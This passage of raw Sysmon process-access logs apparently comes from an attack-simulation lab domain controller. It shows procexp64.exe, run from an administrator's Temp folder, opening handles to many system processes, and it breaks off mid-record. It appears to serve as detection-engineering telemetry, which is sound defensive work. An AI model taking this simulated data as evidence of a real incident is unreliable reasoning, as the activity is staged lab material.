Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf